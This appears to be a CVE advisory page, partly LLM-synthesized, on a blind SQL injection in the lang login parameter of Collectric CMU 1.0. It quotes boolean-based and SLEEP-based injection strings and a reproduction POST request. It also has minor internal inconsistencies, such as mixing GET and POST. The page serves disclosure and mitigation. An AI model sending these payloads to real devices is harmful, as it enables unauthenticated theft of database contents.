Collectric CMU 1.0 SQL Injection via lang Parameter
Description
Collectric CMU 1.0 contains a boolean-based blind SQL injection vulnerability in the lang parameter that allows unauthenticated attackers to manipulate database queries during authentication. Attackers can inject SQL code through the lang parameter in login requests to extract sensitive information from the database using time-based blind techniques.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Collectric CMU 1.0 is vulnerable to unauthenticated blind SQL injection via the `lang` parameter, allowing attackers to extract database information using time-based techniques.
Vulnerability
Collectric CMU 1.0 (and possibly all known versions per [1]) contains a boolean-based blind SQL injection vulnerability in the lang parameter of the login page. An unauthenticated attacker can inject SQL code through this GET parameter, as demonstrated in [1] with payloads such as lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr. The vulnerability is of type CWE-89 [2]. The web interface runs on a NGW board with Linux 2.6.30 and PHP [1].
Exploitation
No authentication is required; an attacker with network access to the Collectric CMU web interface can exploit the vulnerability by sending a crafted HTTP request containing a malicious lang parameter. Boolean-based blind techniques allow inference of database contents, and time-based blind payloads (e.g., AND SLEEP(5)) confirm the injection point. No user interaction is needed beyond the request.
Impact
Successful exploitation enables an unauthenticated attacker to extract sensitive information from the underlying MySQL database. The CVSS v4 vector indicates high confidentiality impact and low integrity impact [2]. Depending on the database contents, this could include user credentials, device configuration, or other sensitive data. The discovered hard-coded credentials in the same source [1] suggest additional risk of lateral movement.
Mitigation
As of the publication date, no official patch or fixed version has been released by the vendor [1][2]. The vendor homepage is http://ourenergy.se/ [1]. Recommended mitigations include restricting network access to the web interface, implementing web application firewall rules to block SQL injection patterns, and reviewing the system for the presence of hard-coded credentials. If not required, the web portal should be disabled.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=1.0?
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the lang parameter allows SQL injection into database queries during authentication."
Attack vector
An unauthenticated attacker sends a GET request to the login page with a crafted lang parameter. The payload injects SQL into the WHERE or HAVING clause of the authentication query, as demonstrated by the boolean-based blind payload `lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr` [ref_id=1]. The attacker can also use time-based blind techniques, such as `lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV`, to extract sensitive information by observing response delays [ref_id=1]. No authentication or special network position is required; the device's PHP admin interface is exposed over the network.
Affected code
The vulnerability exists in the login handling code of the Collectric CMU PHP admin interface, where the lang GET parameter is incorporated into a SQL query without sanitization [ref_id=1]. The exact file path is not disclosed in the advisory, but the parameter is processed during authentication when the user submits the login form.
What the fix does
No patch is provided in the bundle. The advisory does not specify a fix, but the remediation would require sanitizing or parameterizing the lang input before it is used in SQL queries. Given the presence of hard-coded credentials for the web portal, SSH, and MySQL [ref_id=1], the vendor should also rotate all default credentials and apply input validation to all user-controllable parameters.
Preconditions
- networkThe Collectric CMU device must be reachable over the network with its PHP admin interface exposed.
- authNo authentication required; the lang parameter is accepted on the login page before authentication.
Reproduction
1. Access the Collectric CMU login page at the device's web interface. 2. Submit a POST request with the following parameters to trigger boolean-based blind injection: `username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in` [ref_id=1]. 3. To confirm time-based blind injection, replace the lang value with: `SWEDISH' AND SLEEP(5) AND 'kglV'='kglV` and observe a 5-second delay in the response [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- www.exploit-db.com/exploits/45446mitreexploit
- www.vulncheck.com/advisories/collectric-cmu-sql-injection-via-lang-parametermitrethird-party-advisory
- ourenergy.semitreproduct
News mentions
0No linked articles in our index yet.